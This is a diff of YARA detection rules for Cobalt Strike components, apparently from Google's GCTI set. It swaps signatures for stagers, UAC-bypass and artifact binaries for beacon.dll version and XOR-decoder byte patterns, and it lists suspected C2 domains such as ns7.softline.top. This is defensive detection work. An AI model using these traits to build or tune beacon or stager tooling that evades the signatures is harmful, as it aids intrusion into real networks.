-		hash = "211ccc5d28b480760ec997ed88ab2fbc5c19420a3d34c1df7991e65642638a6f"
-		logic_hash = "ad662a263ede6c3ba964baf8abe4848ed1e994f2c236d4315cb60c1d51442620"
+		hash = "f18029e6b12158fb3993f4951dab2dc6e645bb805ae515d205a53a1ef41ca9b2"
+		logic_hash = "6ceb2cec8402a4679bad42d367156c74e897af4188442fdebc70d6ce2dd78bd6"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$stub52 = {fc e8 ?? ?? ?? ?? [1-32] eb 27 5? 8b ??    83 c? ?4 8b ??    31 ?? 83 c? ?4 5? 8b ??    31 ?? 89 ??    31 ?? 83 c? ?4 83 e? ?4 31 ?? 39 ?? 74 ?2 eb ea 5? ff e? e8 d4 ff ff ff}
-		$stub56 = {fc e8 ?? ?? ?? ?? [1-32] eb 2b 5d 8b ?? ?? 83 c5 ?4 8b ?? ?? 31 ?? 83 c5 ?4 55 8b ?? ?? 31 ?? 89 ?? ?? 31 ?? 83 c5 ?4 83 e? ?4 31 ?? 39 ?? 74 ?2 eb e8 5? ff e? e8 d? ff ff ff}
+		$version_sig = { 48 57 8B F9 83 F8 49 0F 87 47 03 00 00 FF 24 }
+		$decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 }
 
 	condition:
-		any of them
+		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Elevate_X64_Dll_V3_0_To_V3_14_And_Sleeve_Elevate_X64_Dll_V4_X
+rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_8
 {
 	meta:
-		description = "Cobalt Strike's resources/elevate.x64.dll signature for v3.0 to v3.14 and sleeve/elevate.x64.dll for v4.x"
+		description = "Cobalt Strike's resources/beacon.dll Versions 3.8"
 		author = "gssincla@google.com"
-		id = "91d5c343-1084-5cfc-9dfa-46f530eb9625"
+		id = "f76712a4-df1c-5e6b-b5ac-9c74f2e202fc"
 		date = "2022-11-18"
-		modified = "2022-11-19"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Elevate_X64_Dll_v3_0_to_v3_14_and_Sleeve_Elevate_X64_Dll_v4_x.yara#L17-L71"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L691-L731"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "c3ee8a9181fed39cec3bd645b32b611ce98d2e84c5a9eff31a8acfd9c26410ec"
-		logic_hash = "6f23bcf6a0c360d2f83140ce633440b13d8b691e75c5560c65656cf8a6114224"
+		hash = "67b6557f614af118a4c409c992c0d9a0cc800025f77861ecf1f3bbc7c293d603"
+		logic_hash = "a0c78dd7cda055bc76a8661b0416a302d7b05d03eeea483d2d1695093cd6dc90"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$wnd_proc = {
-			81 ?? 21 01 00 00
-			75 ??
-			83 [5] 00
-			75 ??
-			45 33 ??
-			8D [2]
-			C7 [5] 01 00 00 00
-			45 [2] 28
-			FF 15 [4]
-			45 33 ??
-			8D [2]
-			45 [2] 27
-			48 [2]
-			FF 15 [4]
-			45 33 ??
-			45 33 ??
-			BA 01 02 00 00
-			48
-		}
+		$version_sig = { 48 57 8B F9 83 F8 4B 0F 87 5D 03 00 00 FF 24 }
+		$decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 }
+		$xmrig_srcpath = "C:/Users/SKOL-NOTE/Desktop/Loader/script.go"
+		$c2_1 = "ns7.softline.top" xor
+		$c2_2 = "ns8.softline.top" xor
+		$c2_3 = "ns9.softline.top" xor
 
 	condition:
-		$wnd_proc
+		$version_sig and $decoder and not ( 2 of ( $c2_* ) or $xmrig_srcpath )
 }
-rule GCTI_Cobaltstrike_Resources_Reverse64_Bin_V2_5_Through_V4_X
+rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_11
 {
 	meta:
-		description = "Cobalt Strike's resources/reverse64.bin signature for versions v2.5 to v4.x"
+		description = "Cobalt Strike's resources/beacon.dll Versions 3.11"
 		author = "gssincla@google.com"
-		id = "966e6e4c-85e2-5c94-8245-25367802b7d2"
+		id = "00e42396-db81-5d43-90ee-5a97b379019e"
 		date = "2022-11-18"
-		modified = "2022-11-19"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Reverse64_Bin_v2_5_through_v4_x.yara#L17-L99"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L739-L770"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "d2958138c1b7ef681a63865ec4a57b0c75cc76896bf87b21c415b7ec860397e8"
-		logic_hash = "c657234156293b9ac363b677490739ab0b5cc2ef149c9d9c37332dab9bb012f6"
+		hash = "2428b93464585229fd234677627431cae09cfaeb1362fe4f648b8bee59d68f29"
+		logic_hash = "24ca0a9c2249d1872a53dc228234bdc6803bdfe9e80847995e0951184a8d935c"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$apiLocator = {
-			48 [2]
-			AC
-			41 [2] 0D
-			41 [2]
-			38 ??
-			75 ??
-			4C [4]
-			45 [2]
-			75 ??
-			5?
-			44 [2] 24
-			49 [2]
-			66 [4]
-			44 [2] 1C
-			49 [2]
-			41 [3]
-			48
-		}
-		$calls = {
-			48 89 C1
-			41 BA EA 0F DF E0
-			FF D5
-			48 [2]
-			6A ??
-			41 ??
-			4C [2]
-			48 [2]
-			41 BA 99 A5 74 61
-			FF D5
-		}
+		$version_sig = { 48 57 8B FA 83 F8 50 0F 87 11 03 00 00 FF 24 }
+		$decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 }
 
 	condition:
-		$apiLocator and $calls
+		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Httpstager_Bin_V2_5_Through_V4_X
+rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_11_Bugfix_And_V3_12
 {
 	meta:
-		description = "Cobalt Strike's resources/httpstager.bin signature for versions 2.5 to 4.x"
+		description = "Cobalt Strike's resources/beacon.dll Versions 3.11-bugfix and 3.12"
 		author = "gssincla@google.com"
-		id = "86109485-c26c-5c51-8d04-dd1add9a8c57"
+		id = "08ff2a2f-97bd-5839-b414-d67fbf2cdb0f"
 		date = "2022-11-18"
-		modified = "2022-11-19"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Httpstager_Bin_v2_5_through_v4_x.yara#L17-L93"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L772-L804"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "a47569af239af092880751d5e7b68d0d8636d9f678f749056e702c9b063df256"
-		logic_hash = "3baab08b0118e00432f1869ba5daa4fc6383bfc020119bfbb3047a008c33fe72"
+		hash = "5912c96fffeabb2c5c5cdd4387cfbfafad5f2e995f310ace76ca3643b866e3aa"
+		logic_hash = "566eb14f918ad422d5a273390263e63ac37b00cd10ac3561e038fb1a27f85d80"
 		score = 75
 		quality = 85
 		tags = ""
+		rs2 = "4476a93abe48b7481c7b13dc912090b9476a2cdf46a1c4287b253098e3523192"
 
 	strings:
-		$apiLocator = {
-			31 ??
-			AC
-			C1 ?? 0D
-			01 ??
-			38 ??
-			75 ??
-			03 [2]
-			3B [2]
-			75 ??
-			5?
-			8B ?? 24
-			01 ??
-			66 8B [2]
-			8B ?? 1C
-			01 ??
-			8B ?? 8B
-			01 ??
-			89 [3]
-			5?
-			5?
-		}
-		$downloaderLoop = {
-			B? 00 2F 00 00
-			39 ??
-			74 ??
-			31 ??
-			( E9 | EB )
-		}
+		$version_sig = { 48 57 8B FA 83 F8 50 0F 87 0D 03 00 00 FF 24 }
+		$decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 }
 
 	condition:
-		$apiLocator and $downloaderLoop
+		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Bypassuac_Dll_V1_49_To_V3_14_And_Sleeve_Bypassuac_Dll_V4_0_To_V4_X
+rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_13
 {
 	meta:
-		description = "Cobalt Strike's resources/bypassuac(-x86).dll from v1.49 to v3.14 (32-bit version) and sleeve/bypassuac.dll from v4.0 to at least v4.4"
+		description = "Cobalt Strike's resources/beacon.dll Versions 3.13"
 		author = "gssincla@google.com"
-		id = "614046b5-cf81-56a5-8824-b3a7e14a8ed5"
+		id = "98dd32e6-9bb5-57b2-a5e5-1c74a0d1e6d3"
 		date = "2022-11-18"
-		modified = "2022-11-19"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Bypassuac_Dll_v1_49_to_v3_14_and_Sleeve_Bypassuac_Dll_v4_0_to_v4_x.yara#L17-L94"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L806-L836"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "91d12e1d09a642feedee5da966e1c15a2c5aea90c79ac796e267053e466df365"
-		logic_hash = "7d59c0286f1936e386519a919472d01581b68a8167c89bd3cd3108d45251119a"
+		hash = "362119e3bce42e91cba662ea80f1a7957a5c2b1e92075a28352542f31ac46a0c"
+		logic_hash = "adafac8692ad676b0168b3e829bc7948db72953b95c79d483ae1a05f1d4f9b2b"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$deleteFileCOM = {
-			A1 [4]
-			6A 00
-			8B ??
-			5?
-			5?
-			FF ?? 48
-			85 ??
-			75 ??
-			A1 [4]
-			5?
-			8B ??
-			FF ?? 54
-		}
-		$copyFileCOM = {
-			A1 [4]
-			6A 00
-			FF [2]
-			8B ??
-			FF [5]
-			FF [5]
-			5?
-			FF ?? 40
-			85 ??
-			[2 - 6]
-			A1 [4]
-			5?
-			8B ??
-			FF ?? 54
-		}
+		$version_sig = { 4A 56 57 83 FA 5A 0F 87 2D 03 00 00 FF 24 }
+		$decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 }
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Httpstager64_Bin_V3_2_Through_V4_X
+rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_14
 {
 	meta:
-		description = "Cobalt Strike's resources/httpstager64.bin signature for versions v3.2 to v4.x"
+		description = "Cobalt Strike's resources/beacon.dll Versions 3.14"
 		author = "gssincla@google.com"
-		id = "5530dce8-e5a1-5133-9b05-464e3397084a"
+		id = "00edfc72-c7b8-5100-8275-ae3548b96e49"
 		date = "2022-11-18"
-		modified = "2022-11-19"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Httpstager64_Bin_v3_2_through_v4_x.yara#L17-L85"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L838-L866"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "ad93d1ee561bc25be4a96652942f698eac9b133d8b35ab7e7d3489a25f1d1e76"
-		logic_hash = "23666169565c6b3e5fa71767dc31096e7a25be049eeab16b074053d76c97c70b"
+		hash = "254c68a92a7108e8c411c7b5b87a2f14654cd9f1324b344f036f6d3b6c7accda"
+		logic_hash = "6faed2b69647b87d86d46ae73ad92cfe7b2746c306cd7480dc9f0c484c8882e2"
 		score = 75
 		quality = 85
 		tags = ""
+		rs2 = "87b3eb55a346b52fb42b140c03ac93fc82f5a7f80697801d3f05aea1ad236730"
 
 	strings:
-		$apiLocator = {
-			48 [2]
-			AC
-			41 [2] 0D
-			41 [2]
-			38 ??
-			75 ??
-			4C [4]
-			45 [2]
-			75 ??
-			5?
-			44 [2] 24
-			49 [2]
-			66 [4]
-			44 [2] 1C
-			49 [2]
-			41 [3]
-			48
-		}
-		$postInternetOpenJmp = {
-			41 ?? 3A 56 79 A7
-			FF ??
-			EB
-		}
+		$version_sig = { 83 FA 5B 77 15 FF 24 }
+		$decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 }
 
 	condition:
-		$apiLocator and $postInternetOpenJmp
+		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Httpsstager_Bin_V2_5_Through_V4_X
+rule GCTI_Cobaltstrike_Sleeve_Beacon_Dll_V4_0_Suspected
 {
 	meta:
-		description = "Cobalt Strike's resources/httpsstager.bin signature for versions 2.5 to 4.x"
+		description = "Cobalt Strike's sleeve/beacon.dll Versions 4.0 (suspected, not confirmed)"
 		author = "gssincla@google.com"
-		id = "f45aa40a-3936-50f9-a60e-de7181862d19"
+		id = "50ff6e44-ebc0-5000-a816-b385a6675768"
 		date = "2022-11-18"
-		modified = "2022-11-19"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Httpsstager_Bin_v2_5_through_v4_x.yara#L17-L95"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L868-L901"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "5ebe813a4c899b037ac0ee0962a439833964a7459b7a70f275ac73ea475705b3"
-		logic_hash = "d2f722809a59faf8ecd85e46eadf58bf23ba5f515ad9c949843f1e6bfeec1fbf"
+		hash = "e2b2b72454776531bbc6a4a5dd579404250901557f887a6bccaee287ac71b248"
+		logic_hash = "6875099bc6df26f829f9f64e70bd7fdac6ac7b83a5596fc9359c127fef4e6db5"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$apiLocator = {
-			31 ??
-			AC
-			C1 ?? 0D
-			01 ??
-			38 ??
-			75 ??
-			03 [2]
-			3B [2]
-			75 ??
-			5?
-			8B ?? 24
-			01 ??
-			66 8B [2]
-			8B ?? 1C
-			01 ??
-			8B ?? 8B
-			01 ??
-			89 [3]
-			5?
-			5?
-		}
-		$InternetSetOptionA = {
-			6A 04
-			5?
-			6A 1F
-			5?
-			68 75 46 9E 86
-			FF
-		}
+		$version_sig = { 51 4A 56 57 83 FA 62 0F 87 8F 03 00 00 FF 24 95 56 7B 00 10 }
+		$decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 }
 
 	condition:
-		$apiLocator and $InternetSetOptionA
+		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Bypassuactoken_Dll_V3_11_To_V3_14
+rule GCTI_Cobaltstrike_Sleeve_Beacon_Dll_V4_1_And_V4_2
 {
 	meta:
-		description = "Cobalt Strike's resources/bypassuactoken.dll from v3.11 to v3.14 (32-bit version)"
+		description = "Cobalt Strike's sleeve/beacon.dll Versions 4.1 and 4.2"
 		author = "gssincla@google.com"
-		id = "b9f25fa5-bd1d-5ba0-9b1d-bb97e1dbf76b"
+		id = "793df916-bdf7-5743-b008-0113caf38bae"
 		date = "2022-11-18"
-		modified = "2022-11-19"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Bypassuactoken_Dll_v3_11_to_v3_14.yara#L17-L151"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L903-L934"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "df1c7256dfd78506e38c64c54c0645b6a56fc56b2ffad8c553b0f770c5683070"
-		logic_hash = "fe0780b7f4c16b55cfa00ea7de4da8ce349ec8a72de763b72e816ebc8e934b6d"
+		hash = "daa42f4380cccf8729129768f3588bb98e4833b0c40ad0620bb575b5674d5fc3"
+		logic_hash = "7280a5c3f478ea40b6b72fb4669d5b8c21603e7fbfbc3815a83bc462ee19c0f5"
 		score = 75
 		quality = 85
 		tags = ""
+		rs2 = "9de55f27224a4ddb6b2643224a5da9478999c7b2dea3a3d6b3e1808148012bcf"
 
 	strings:
-		$isHighIntegrityProcess = {
-			5?
-			5?
-			5?
-			8B ??
-			6A 19
-			5?
-			FF 15 [4]
-			85 C0
-			75 ??
-			FF 15 [4]
-			83 ?? 7A
-			75 ??
-			FF [2]
-			5?
-			FF 15 [4]
-			8B ??
-			8D [2]
-			5?
-			FF [2]
-			5?
-			6A 19
-			5?
-			FF 15 [4]
-			85 C0
-			74 ??
-			FF ??
-			FF 15 [4]
-			8A ??
-			FE C8
-			0F B6 C0
-			5?
-			FF ??
-			FF 15 [4]
-			B? 01 00 00 00
-			5?
-			81 ?? 00 30 00 00
-		}
-		$executeTaskmgr = {
-			6A 3C
-			8D ?? C4
-			8B ??
-			6A 00
-			5?
-			8B ??
-			E8 [4]
-			83 C4 0C
-			C7 [2] 3C 00 00 00
-			8D [2]
-			C7 [2] 40 00 00 00
-			C7 [6]
-			C7 [2] 00 00 00 00
-			5?
-			C7 [2] 00 00 00 00
-			C7 [6]
-			C7 [2] 00 00 00 00
-			FF 15 [4]
-			FF 75 FC
-		}
+		$version_sig = { 48 57 8B F2 83 F8 63 0F 87 3C 03 00 00 FF 24 }
+		$decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 }
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Artifact64_V1_49_V2_X_V3_0_V3_3_Thru_V3_14
+rule GCTI_Cobaltstrike_Sleeve_Beacon_Dll_V4_3_V4_4_V4_5_And_V4_6
 {
 	meta:
-		description = "Cobalt Strike's resources/artifact64{.dll,.exe,big.exe,big.dll,bigsvc.exe,big.x64.dll} and resources/rtifactuac(alt)64.dll signature for versions v1.49, v2.x, v3.0, and v3.3 through v3.14"
+		description = "Cobalt Strike's sleeve/beacon.dll Versions 4.3 and 4.4"
 		author = "gssincla@google.com"
-		id = "67902782-500e-5a89-8b2a-59ee21bcba3e"
+		id = "976e087c-f371-5fc6-85f8-9c803a91f549"
 		date = "2022-11-18"
-		modified = "2022-11-19"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Artifact64_v1_49_to_v4_x.yara#L17-L54"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L936-L967"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "9ec57d306764517b5956b49d34a3a87d4a6b26a2bb3d0fdb993d055e0cc9920d"
-		logic_hash = "289950e89fc743ff4a1b7dcb91c561c7d829cfe3ade1c2f1a09f2e9701cce461"
+		hash = "51490c01c72c821f476727c26fbbc85bdbc41464f95b28cdc577e5701790845f"
+		logic_hash = "6608a84c4fd3bf77fd5b426da8be250d8b99878bd746fa23789f4791a164ce33"
 		score = 75
 		quality = 85
 		tags = ""
+		rs2 = "78a6fbefa677eeee29d1af4a294ee57319221b329a2fe254442f5708858b37dc"
 
 	strings:
-		$a = { 8B [2] 48 98 48 [2] 48 [3] 8B [2] 48 98 48 [3] 44 [3] 8B [2] 89 ?? C1 ?? 1F C1 ?? 1E 01 ?? 83 ?? 03 29 ?? 48 98 48 [3] 0F B6 00 44 [2] 88 }
+		$version_sig = { 48 57 8B F2 83 F8 65 0F 87 47 03 00 00 FF 24 }
+		$decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 }
 
 	condition:
-		$a
+		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Artifact64_V3_1_V3_2_V3_14_And_V4_0
+rule GCTI_Cobaltstrike_Sleeve_Beacon_Dll_V4_7_Suspected
 {
 	meta:
-		description = "Cobalt Strike's resources/artifact64{svcbig.exe,.dll,big.dll,svc.exe} and resources/artifactuac(big)64.dll signature for versions 3.14 to 4.x and resources/artifact32svc.exe for 3.14 to 4.x"
+		description = "Cobalt Strike's sleeve/beacon.dll Versions 4.7 (suspected, not confirmed)"
 		author = "gssincla@google.com"
-		id = "c9e9b8e0-16fe-5abc-b1fe-0e3e586f6db6"
+		id = "4b6f90dd-69f3-5555-9195-6a0aed0fff58"
 		date = "2022-11-18"
-		modified = "2022-11-19"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Artifact64_v1_49_to_v4_x.yara#L56-L84"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L969-L1002"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "2e7a39bd6ac270f8f548855b97c4cef2c2ce7f54c54dd4d1aa0efabeecf3ba90"
-		logic_hash = "e5af04baa1d18d5a2a2c005b40bf93fe6a7b2d7116dfcf3c5b3fa36657448eb9"
+		hash = "da9e91b3d8df3d53425dd298778782be3bdcda40037bd5c92928395153160549"
+		logic_hash = "297ff7c3acfe6f9676dc6c265c548f017f39ccc5217617344e3bccc704ac4c78"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$decoderFunction = { 31 ?? EB 0F 41 [2] 03 47 [3] 44 [3] 48 [2] 39 ?? 41 [2] 7C EA 4C [6] E9 }
+		$version_sig = { 53 56 48 57 8B F2 83 F8 67 0F 87 5E 03 00 00  }
+		$decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 }
 
 	condition:
-		$decoderFunction
+		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Artifact64_V3_14_To_V4_X
+rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_2
 {
 	meta:
-		description = "Cobalt Strike's resources/artifact64{.exe,.dll,svc.exe,svcbig.exe,big.exe,big.dll,.x64.dll,big.x64.dll} and resource/artifactuac(alt)64.exe signature for versions v3.14 through v4.x"
+		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.2"
 		author = "gssincla@google.com"
-		id = "1c7731d3-429b-57aa-9c17-8de7d0841b1e"
+		id = "61188243-0b90-5bff-bcc8-50f10ed941f6"
 		date = "2022-11-18"
-		modified = "2022-11-19"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Artifact64_v1_49_to_v4_x.yara#L86-L128"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1029-L1068"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "decfcca0018f2cec4a200ea057c804bb357300a67c6393b097d52881527b1c44"
-		logic_hash = "af8ba6ba62bf1179510b0940e60f893f61b3ba10c81001dd90fe4c3521e56a37"
+		hash = "5993a027f301f37f3236551e6ded520e96872723a91042bfc54775dcb34c94a1"
+		logic_hash = "3803aaac537aec0b188870177e510a3789a71c19be576569b59aa146b2ba62c5"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$fmtBuilder = {
-			41 ?? 5C 00 00 00
-			C7 [3] 5C 00 00 00
-			C7 [3] 65 00 00 00
-			C7 [3] 70 00 00 00
-			C7 [3] 69 00 00 00
-			C7 [3] 70 00 00 00
-			C7 [3] 5C 00 00 00
-			C7 [3] 2E 00 00 00
-			89 [3]
-			48 [6]
-			E8
-		}
-		$fmtString = "%c%c%c%c%c%c%c%c%cMSSE-%d-server"
+		$version_sig = { 4C 8D 05 9F F8 FF FF 8B D3 48 8B CF E8 05 1A 00 00
+                     EB 0A 8B D3 48 8B CF E8 41 21 00 00 48 8B 5C 24 30
+                     48 83 C4 20 }
+		$decoder = { 80 31 ?? FF C2 48 FF C1 48 63 C2 48 3D 10 06 00 00 }
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Covertvpn_Dll_V2_1_To_V4_X
+rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_3
 {
 	meta:
-		description = "Cobalt Strike's resources/covertvpn.dll signature for version v2.2 to v4.4"
+		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.3"
 		author = "gssincla@google.com"
-		id = "a65b855c-5703-5b9f-bb57-da8ebf898f9b"
+		id = "fb96ecff-809e-5704-974e-a2d8ef022daa"
 		date = "2022-11-18"
-		modified = "2022-11-19"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Covertvpn_Dll_v2_1_to_v4_x.yara#L17-L120"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1070-L1109"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "0a452a94d53e54b1df6ba02bc2f02e06d57153aad111171a94ec65c910d22dcf"
-		logic_hash = "1f6e4254fdfd4f9b13c2000333aabbb7da90d2df7ee1b12faa6ea3c066351468"
+		hash = "7b00721efeff6ed94ab108477d57b03022692e288cc5814feb5e9d83e3788580"
+		logic_hash = "514d491b8066ed7127ebb152a27efbe65e1121da3b5460afe6987920a91f2863"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$dropComponentsAndActivateDriver_prologue = {
-			5?
-			68 [4]
-			68 [4]
-			C7 [3-5] 00 00 00 00
-			FF 15 [4]
-			50
-			FF 15 [4]
-			8B ??
-			85 ??
-			74 ??
-			8D [3-5]
-			5?
-			FF 15 [4]
-			50
-		}
-		$dropFile = {
-			6A 00
-			5?
-			E8 [4]
-			83 C4 08
-			83 F8 FF
-			74 ??
-			5?
-			[0-5]
-			E8 [4]
-			83 C4 ??
-			[0-2]
-			6A 00
-			68 80 01 00 00
-			6A 02
-			6A 00
-			6A 05
-			68 00 00 00 40
-			5?
-			FF 15 [4]
-			8B ??
-			83 ?? FF
-			75 ??
-			FF 15 [4]
-			5?
-		}
-		$nfp = "npf.sys" nocase
-		$wpcap = "wpcap.dll" nocase
+		$version_sig = { 8B D3 48 8B CF E8 89 66 00 00 E9 23 FB FF FF
+                     41 B8 01 00 00 00 E9 F3 FD FF FF 48 8D 0D 2A F8 FF FF
+                     E8 8D 2B 00 00 48 8B 5C 24 30 48 83 C4 20 }
+		$decoder = { 80 31 ?? FF C2 48 FF C1 48 63 C2 48 3D 10 06 00 00 }
 
 	condition:
 		all of them
 }
